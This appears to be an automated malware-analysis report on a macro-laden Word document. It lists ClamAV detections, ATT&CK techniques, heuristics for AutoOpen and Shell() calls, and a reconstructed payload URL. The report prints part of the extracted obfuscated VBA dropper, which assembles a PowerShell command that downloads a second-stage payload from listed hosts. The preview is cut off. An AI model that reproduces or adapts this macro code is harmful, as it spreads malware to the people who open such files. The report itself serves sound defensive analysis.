MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file contains VBA macros, including an AutoOpen function, which is a common technique for malicious documents. The critical heuristic firing for Shell() indicates that the macro attempts to execute external commands. The ClamAV detection of 'Img.Dropper.PhishingLure-6443153-0' and 'Doc.Trojan.Obfuscated-6443078-0' further supports a malicious dropper or downloader. The reconstructed URL 'http://blog.siplik.com/vTW5jYjY/pXIAhVNF' is likely the source of the second-stage payload.
Heuristics 5
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74317 bytes |
SHA-256: 82de7429ce70a6f9cfbbc822bce8bfbcdf8829b69e6a6dee877e2a0059d062e0 |
|||
|
Detection
ClamAV:
Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AqkATsDs"
Function GFUXzrWdafKF()
On Error Resume Next
whlMibJQ = 44224474 / IjNoqdzbWAN - 536083786 + CSng(lwpsDRNawui) + 2 - Chr(7013) - qzScOXP / 8527 * VboGMuXkaGoI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BpimrYmr)
hzdGUvi = 44224474 / cIjdYPPdFBOkh - 536083786 + CSng(KNXnHQdCZVUDn) + 2 - Chr(7013) - viRmjbAhEoaSZ / 8527 * DzzTqMEwpZiOOZ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(KJUcahbjcDFq)
luihUl = Mid("Gw1fkwI0Y9YqQLmvzvltftUuFBXGa+JIq= JIq+JIqzJIq+JIqTJIq+JTmi+TmiIq3ns'+'J2jdMm", 30, 43)
ndLfBF = 44224474 / iOEHwrKWN - 536083786 + CSng(kbEJKijJucArFW) + 2 - Chr(7013) - oKjqXwdtFzZBEw / 8527 * ZDtpYjwfXDK + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rPPmIiJJh)
vizVdtJtPb = 44224474 / UDICVNjaQ - 536083786 + CSng(awcfTuM) + 2 - Chr(7013) - QcjJSYVYiDW / 8527 * kdXWzupPRICbMI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(sPFXWpocBkLlj)
XzljljTvpJT = 44224474 / jqAGizMlhbN - 536083786 + CSng(CzwQzRsfM) + 2 - Chr(7013) - MjmiqKQTvmww / 8527 * CoRwzSmWjC + Fix(7798) + 9905 * Sin(7) / 310 * Sin(MRorkrQCOti)
IIuYBIs = Mid("K5Ha7E5ZUKdd3NFl84GwVD8q+'+'JIqhtJIq+JIqtpsJ'+'Tmi+TmiIq+JIq://JIq+JIqblogJIq+JIq.siplikJITmi+Tmiq+JIq.com/vTW'+'5JI'+'q+JIqjYJIq+JIq/pXIAhVNF", 24, 112)
oiIVGzSY = 44224474 / wfcEUTzYFiZF - 536083786 + CSng(IIaFwJhdJdfzFv) + 2 - Chr(7013) - VmmJFiU / 8527 * ZXsotTJXwQs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(UbfObCDnCzE)
AOkYLrt = 44224474 / NYhziHEX - 536083786 + CSng(bErsJiwSi) + 2 - Chr(7013) - rTIMcomsiM / 8527 * bHiIcCBSwkjDjj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(WAiRRDT)
PZtPnKs = 44224474 / YzCTvPAOo - 536083786 + CSng(AhEVnJzFhiM) + 2 - Chr(7013) - fuGXiCfha / 8527 * SdQwRqbiQir + Fix(7798) + 9905 * Sin(7) / 310 * Sin(bwKFOtowPVBIR)
PjArj = Mid("iRuUftVZHKo][Tmi+cnvajP6zrBU9aZdW9DkqcRZK2O3", 12, 6)
OVzTIKj = 44224474 / apFLEJwOaKRA - 536083786 + CSng(NjjbwzmnHPYdbR) + 2 - Chr(7013) - NMvtHWETXqzI / 8527 * VJsSjEJQwpUDhw + Fix(7798) + 9905 * Sin(7) / 310 * Sin(ZjidsLANP)
FTsnc = 44224474 / azwCuLDsIUZ - 536083786 + CSng(GdivQrQUN) + 2 - Chr(7013) - zkEpMXicdXd / 8527 * lziSIOkObWLZh + Fix(7798) + 9905 * Sin(7) / 310 * Sin(oEGiBHS)
hnuvUjCIT = 44224474 / saIQIkzrmS - 536083786 + CSng(XGuWIUPWbpZalt) + 2 - Chr(7013) - ITQoVvduqiAAp / 8527 * UMviUCa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GkqkrnhSzXWSc)
CnvPEptjQ = Mid("ScBEpnCh8q+JIqc in zT3bcd){JIq+JIqt'+'ry{Tmi+'+'TmiJIq+JIqzT3francJIq+JIq.D'+'JIq+JIqownloJIq+JIqadFile'+'(zT'+'3abc.ToStrinJIqiL3pXSUfGlA9", 10, 118)
OrUhj = 44224474 / AMzEzfOfqCoRsh - 536083786 + CSng(zjBkzEaZ) + 2 - Chr(7013) - HIjZWwVVWqz / 8527 * VDPEzwjIlQ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(HrIvAXTq)
vqSQTXvBUMO = 44224474 / oKUsAMHYZMYoTF - 536083786 + CSng(cVkEjjoHHhRrN) + 2 - Chr(7013) - AdnDtARzcKK / 8527 * IpBSfPahvkKPa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zDMKjUusZ)
LQVZTcVmrL = 44224474 / mSzqwoIrjS - 536083786 + CSng(BjqcjlfzHuQuqv) + 2 - Chr(7013) - hNDVwCAXjDG / 8527 * HKoocSVLXA + Fix(7798) + 9905 * Sin(7) / 310 * Sin(POrUifWXGvUH)
HwSzLzJw = Mid("IMzvBTMzY9zAmWu0zWldqn3TVLzItq80+['+'CHAr]73),[CHA'+'r]1'+'24 -cREpLACE ([CHAr]115+[CHAr]105+[CHAr]49'+'),[CHAr]36)) ').REPLace('Tmi',[STriNG][cHAR]39).REPLace('Pt2',[STriNG][cHAR]36) ) Iz5", 31, 156)
fLKid = 44224474 / kkZEXisaunYz - 536083786 + CSng(oBBRfjP) + 2 - Chr(7013) - XdiANkSbqw / 8527 * PTivpVKRs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(VmpAwYIhDPJK)
rXPirCWKR = 44224474 / DujQFQG - 536083786 + CSng(fikSQiV) + 2 - Chr(7013) - EzktIjDuHXjpO / 8527 * YKXoNFrBj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rdldhjF)
sDbajvOOn = 44224474 / MHvEJtawD - 536083786 + CSng(JkmGGLvVRWjCq) + 2 - Chr(7013) - APMJtnjGEEVnu / 8527 * AYSlRzjQM + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CWHtrnfKQ)
QaKhYE = Mid("FaLGq+JIq/,htJIq+Tmi+TmiJIT'+'mi+TmiqtJIq+JIqp:JIq+JIq//charlesdundaJI'+'q+JIqs.co.8J7nXjiHU58MIilakj1
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.